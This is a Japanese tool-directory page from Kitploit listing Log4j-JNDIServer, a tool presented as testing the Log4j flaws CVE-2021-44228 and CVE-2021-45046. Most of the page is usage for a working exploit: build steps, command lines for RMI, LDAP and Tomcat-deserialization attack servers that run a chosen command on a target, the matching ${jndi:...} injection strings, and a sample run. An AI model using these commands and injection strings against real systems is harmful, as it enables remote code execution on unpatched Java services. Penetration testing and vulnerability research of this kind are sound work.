Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j-JNDIServer — このプロジェクトはLog4j CVE-2021-44228脆弱性のテストに役立ちます。 | Kitploit
ツール/GitHubGitHub/immunityinc/log4j-jndiserver
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールリモートアクセスツール
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

このプロジェクトはLog4j CVE-2021-44228脆弱性のテストに役立ちます。

リポジトリを見る
924年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j-JNDIServer

このプロジェクトは、Log4jの脆弱性CVE-2021-44228およびCVE-2021-45046をテストするのに役立ちます。

インストールとビルド

  • IntelliJ IDEAでプロジェクトを読み込む
  • 「プロジェクト設定」でJDKを選択 (Ctrl + Alt + Shift + S)
  • 「プロジェクト設定」でアーティファクトを作成 -> 「アーティファクト」 -> 「モジュールからJARを作成」 -> 「ライブラリからのJARファイル」で「ターゲットJARに抽出」を選択 -> 「OK」
  • プロジェクトをビルド (Ctrl + F9)。これにより、/out/artifacts/ フォルダにjarファイルが作成されます。

Mavenでのビルド

Java 1.8以上およびMaven 3.x以上が必要

  • mvn clean package -DskipTests
  • .jarファイルは/targetフォルダにあります。

使用方法

1.RMI攻撃ベクトル

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Exploit.classをホストする必要はありません。アプリは指定されたポートでHTTPサーバーを起動します。

ターゲットで実行したいコマンドを指定する必要があります。

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.LDAP攻撃ベクトル

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Exploit.classをホストする必要はありません。アプリは指定されたポートでHTTPサーバーを起動します。

ターゲットで実行したいコマンドを指定する必要があります。

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.デシリアライゼーション攻撃ベクトル (Tomcatペイロード使用)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

例

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
ツールをダウンロード